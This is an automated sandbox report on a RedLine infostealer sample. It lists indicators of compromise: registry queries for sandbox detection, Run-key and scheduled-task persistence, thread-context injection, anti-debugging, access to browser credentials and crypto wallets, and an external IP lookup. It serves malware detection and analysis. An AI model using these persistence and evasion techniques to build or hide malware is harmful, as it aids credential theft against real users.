redline | 90aa6a7c770f2c0f49596731c80fda7d044802dea9e905ff999b39cda5428407

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	6358932.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	2100396.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	1779428.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	6312160.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	6312160.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	8190389.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	8190389.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	6358932.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	2100396.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	1779428.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	4421370.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	4421370.exe

Loads dropped DLL 32 IoCs

pid	Process
4148	setup_install.exe
4148	setup_install.exe
4148	setup_install.exe
4148	setup_install.exe
4148	setup_install.exe
5132	Tue11b9d76a96506.tmp
5340	rundll32.exe
1392	Tue11e4e580f2e8141a3.exe
5140	setup_2.tmp
4524	rundll32.exe
4860	installer.exe
4860	installer.exe
4860	installer.exe
904	MsiExec.exe
904	MsiExec.exe
4080	rundll32.exe
3716	MsiExec.exe
3716	MsiExec.exe
3716	MsiExec.exe
3716	MsiExec.exe
3716	MsiExec.exe
3716	MsiExec.exe
3716	MsiExec.exe
3716	MsiExec.exe
3716	MsiExec.exe
3716	MsiExec.exe
4860	installer.exe
3716	MsiExec.exe
3716	MsiExec.exe
4764	MsiExec.exe
4764	MsiExec.exe
3716	MsiExec.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Themida packer 3 IoCs

Detects Themida, an advanced Windows software protection system.

themida

resource	yara_rule
behavioral2/files/0x000200000002b1d9-323.dat	themida
behavioral2/files/0x000100000002b1ea-308.dat	themida
behavioral2/files/0x000100000002b1ea-297.dat	themida

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 3 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinHost = "C:\\Users\\Admin\\AppData\\Roaming\\WinHost\\WinHoster.exe"	410673.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\Microsoft.NET\\Juladigaeko.exe\""	46807GHF____.exe
Key created	\REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run	msedge.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 6 IoCs

evasion trojan

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	1779428.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	6312160.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	4421370.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	8190389.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	6358932.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	2100396.exe

Enumerates connected drives 3 TTPs 64 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
File opened (read-only)	\??\F:	installer.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\M:	installer.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\I:	installer.exe
File opened (read-only)	\??\J:	installer.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\V:	installer.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\G:	installer.exe
File opened (read-only)	\??\P:	installer.exe
File opened (read-only)	\??\S:	installer.exe
File opened (read-only)	\??\U:	installer.exe
File opened (read-only)	\??\F:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\K:	installer.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\H:	installer.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\B:	installer.exe
File opened (read-only)	\??\W:	installer.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\O:	installer.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\N:	installer.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\L:	installer.exe
File opened (read-only)	\??\T:	installer.exe
File opened (read-only)	\??\Z:	installer.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\A:	installer.exe
File opened (read-only)	\??\E:	installer.exe
File opened (read-only)	\??\Q:	installer.exe
File opened (read-only)	\??\R:	installer.exe
File opened (read-only)	\??\Q:	msiexec.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
9	ip-api.com

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

pid	Process
1200	6358932.exe
736	2100396.exe

Suspicious use of SetThreadContext 64 IoCs

description	pid	Process	procid_target
PID 5008 set thread context of 5416	5008	Tue11e4e580f2e8141a3.exe	106
PID 5008 set thread context of 788	5008	Tue11e4e580f2e8141a3.exe	122
PID 5008 set thread context of 5620	5008	Tue11e4e580f2e8141a3.exe	136
PID 5008 set thread context of 4732	5008	Tue11e4e580f2e8141a3.exe	149
PID 5008 set thread context of 4868	5008	Tue11e4e580f2e8141a3.exe	159
PID 5008 set thread context of 5480	5008	Tue11e4e580f2e8141a3.exe	169
PID 5008 set thread context of 4600	5008	Tue11e4e580f2e8141a3.exe	174
PID 5008 set thread context of 5572	5008	Tue11e4e580f2e8141a3.exe	181
PID 5008 set thread context of 1392	5008	Tue11e4e580f2e8141a3.exe	184
PID 5008 set thread context of 4596	5008	Tue11e4e580f2e8141a3.exe	188
PID 5008 set thread context of 5364	5008	Tue11e4e580f2e8141a3.exe	190
PID 5008 set thread context of 4992	5008	Tue11e4e580f2e8141a3.exe	232
PID 5008 set thread context of 4812	5008	Tue11e4e580f2e8141a3.exe	237
PID 5008 set thread context of 6224	5008	Tue11e4e580f2e8141a3.exe	240
PID 5008 set thread context of 6776	5008	Tue11e4e580f2e8141a3.exe	241
PID 5008 set thread context of 6204	5008	Tue11e4e580f2e8141a3.exe	242
PID 5280 set thread context of 6244	5280	services64.exe	250
PID 5008 set thread context of 7104	5008	Tue11e4e580f2e8141a3.exe	251
PID 5008 set thread context of 7096	5008	Tue11e4e580f2e8141a3.exe	257
PID 5008 set thread context of 7084	5008	Tue11e4e580f2e8141a3.exe	263
PID 5008 set thread context of 2016	5008	Tue11e4e580f2e8141a3.exe	267
PID 5008 set thread context of 6848	5008	Tue11e4e580f2e8141a3.exe	268
PID 5008 set thread context of 6636	5008	Tue11e4e580f2e8141a3.exe	271
PID 5008 set thread context of 5652	5008	Tue11e4e580f2e8141a3.exe	272
PID 5008 set thread context of 5256	5008	Tue11e4e580f2e8141a3.exe	275
PID 5008 set thread context of 4400	5008	Tue11e4e580f2e8141a3.exe	276
PID 5008 set thread context of 7056	5008	Tue11e4e580f2e8141a3.exe	277
PID 5008 set thread context of 1760	5008	Tue11e4e580f2e8141a3.exe	279
PID 5008 set thread context of 6028	5008	Tue11e4e580f2e8141a3.exe	281
PID 5008 set thread context of 132	5008	Tue11e4e580f2e8141a3.exe	282
PID 5008 set thread context of 6628	5008	Tue11e4e580f2e8141a3.exe	283
PID 5008 set thread context of 1568	5008	Tue11e4e580f2e8141a3.exe	284
PID 5008 set thread context of 1484	5008	Tue11e4e580f2e8141a3.exe	286
PID 5008 set thread context of 6752	5008	Tue11e4e580f2e8141a3.exe	288
PID 5008 set thread context of 1624	5008	Tue11e4e580f2e8141a3.exe	290
PID 5008 set thread context of 6544	5008	Tue11e4e580f2e8141a3.exe	293
PID 5008 set thread context of 2640	5008	Tue11e4e580f2e8141a3.exe	294
PID 5008 set thread context of 4728	5008	Tue11e4e580f2e8141a3.exe	295
PID 5008 set thread context of 1764	5008	Tue11e4e580f2e8141a3.exe	296
PID 5008 set thread context of 1532	5008	Tue11e4e580f2e8141a3.exe	298
PID 5008 set thread context of 6656	5008	Tue11e4e580f2e8141a3.exe	301
PID 5008 set thread context of 6448	5008	Tue11e4e580f2e8141a3.exe	302
PID 5008 set thread context of 5252	5008	Tue11e4e580f2e8141a3.exe	303
PID 5008 set thread context of 5640	5008	Tue11e4e580f2e8141a3.exe	304
PID 5008 set thread context of 1560	5008	Tue11e4e580f2e8141a3.exe	305
PID 5008 set thread context of 5436	5008	Tue11e4e580f2e8141a3.exe	308
PID 5008 set thread context of 1380	5008	Tue11e4e580f2e8141a3.exe	310
PID 5008 set thread context of 6412	5008	Tue11e4e580f2e8141a3.exe	312
PID 5008 set thread context of 5888	5008	Tue11e4e580f2e8141a3.exe	313
PID 5008 set thread context of 3216	5008	Tue11e4e580f2e8141a3.exe	317
PID 5008 set thread context of 6148	5008	Tue11e4e580f2e8141a3.exe	320
PID 5008 set thread context of 5856	5008	Tue11e4e580f2e8141a3.exe	321
PID 5008 set thread context of 3056	5008	Tue11e4e580f2e8141a3.exe	323
PID 5008 set thread context of 1248	5008	Tue11e4e580f2e8141a3.exe	324
PID 5008 set thread context of 2604	5008	Tue11e4e580f2e8141a3.exe	326
PID 5008 set thread context of 4468	5008	Tue11e4e580f2e8141a3.exe	328
PID 5008 set thread context of 1020	5008	Tue11e4e580f2e8141a3.exe	329
PID 5008 set thread context of 1160	5008	Tue11e4e580f2e8141a3.exe	330
PID 5008 set thread context of 5628	5008	Tue11e4e580f2e8141a3.exe	332
PID 5008 set thread context of 1340	5008	Tue11e4e580f2e8141a3.exe	333
PID 5008 set thread context of 5632	5008	Tue11e4e580f2e8141a3.exe	334
PID 5008 set thread context of 1684	5008	Tue11e4e580f2e8141a3.exe	335
PID 5008 set thread context of 3300	5008	Tue11e4e580f2e8141a3.exe	336
PID 5008 set thread context of 6664	5008	Tue11e4e580f2e8141a3.exe	338

Drops file in Program Files directory 10 IoCs

description	ioc	Process
File created	C:\Program Files (x86)\FarLabUninstaller\is-LI1M7.tmp	setup_2.tmp
File created	C:\Program Files (x86)\UltraMediaBurner\unins000.dat	ultramediaburner.tmp
File created	C:\Program Files (x86)\Microsoft.NET\Juladigaeko.exe.config	46807GHF____.exe
File opened for modification	C:\Program Files (x86)\UltraMediaBurner\unins000.dat	ultramediaburner.tmp
File created	C:\Program Files (x86)\FarLabUninstaller\unins000.dat	setup_2.tmp
File opened for modification	C:\Program Files (x86)\FarLabUninstaller\unins000.dat	setup_2.tmp
File opened for modification	C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe	ultramediaburner.tmp
File created	C:\Program Files (x86)\UltraMediaBurner\is-MEKLU.tmp	ultramediaburner.tmp
File created	C:\Program Files (x86)\UltraMediaBurner\is-OT15E.tmp	ultramediaburner.tmp
File created	C:\Program Files (x86)\Microsoft.NET\Juladigaeko.exe	46807GHF____.exe

Drops file in Windows directory 28 IoCs

description	ioc	Process
File created	C:\Windows\Installer\f7495fc.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\f7495fc.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI999C.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI9BF2.tmp	msiexec.exe
File created	C:\Windows\SystemTemp\~DFB9764289C3222608.TMP	msiexec.exe
File created	C:\Windows\AppCompat\Programs\Amcache.hve.tmp	WerFault.exe
File opened for modification	C:\Windows\Installer\MSI98EC.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI997C.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI9A68.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\	msiexec.exe
File created	C:\Windows\Installer\SourceHash{C845414C-903C-4218-9DE7-132AB97FDF62}	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI985E.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI995B.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI9B45.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI9CBE.tmp	msiexec.exe
File created	C:\Windows\SystemTemp\~DF54EB34252A3E1480.TMP	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI9E95.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI9725.tmp	msiexec.exe
File created	C:\Windows\SystemTemp\~DFC7526BE88BC65C56.TMP	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI9CDE.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI9F62.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI992C.tmp	msiexec.exe
File created	C:\Windows\Installer\inprogressinstallinfo.ipi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI9F32.tmp	msiexec.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI9AB7.tmp	msiexec.exe
File created	C:\Windows\Tasks\AdvancedWindowsManager #1.job	MsiExec.exe
File created	C:\Windows\SystemTemp\~DF3018AA77CF04FD2E.TMP	msiexec.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 32 IoCs

pid	pid_target	Process	procid_target
5652	5080	WerFault.exe	93
5644	4856	WerFault.exe	101
5668	4868	WerFault.exe	99
5468	5340	WerFault.exe	134
1160	6072	WerFault.exe	119
5876	1368	WerFault.exe	124
1364	4584	WerFault.exe	98
2816	4600	WerFault.exe	120
3236	4524	WerFault.exe	171
5972	4808	WerFault.exe	193
732	6052	WerFault.exe	211
1616	4080	WerFault.exe	224
6936	5368	WerFault.exe	167
6860	5624	WerFault.exe	113
1364	5708	WerFault.exe	145
7100	5028	WerFault.exe	139
988	5888	WerFault.exe	313
6296	1544	WerFault.exe	350
1168	6720	WerFault.exe	390
3200	5712	WerFault.exe	404
4636	2624	WerFault.exe	415
7840	7716	WerFault.exe	473
5668	6292	WerFault.exe	523
3916	6572	WerFault.exe	598
6576	8416	WerFault.exe	622
9836	9672	WerFault.exe	695
2396	9380	WerFault.exe	751
5248	9752	WerFault.exe	758
9752	9328	WerFault.exe	767
7172	4752	WerFault.exe	824
10744	10952	WerFault.exe	870
700	11332	WerFault.exe	898

Checks processor information in registry 2 TTPs 64 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	UltraMediaBurner.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	UltraMediaBurner.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	UltraMediaBurner.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	Tue11e4e580f2e8141a3.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	WerFault.exe

Creates scheduled task(s) 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

pid	Process
1048	schtasks.exe
6904	schtasks.exe

Enumerates system info in registry 2 TTPs 64 IoCs

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
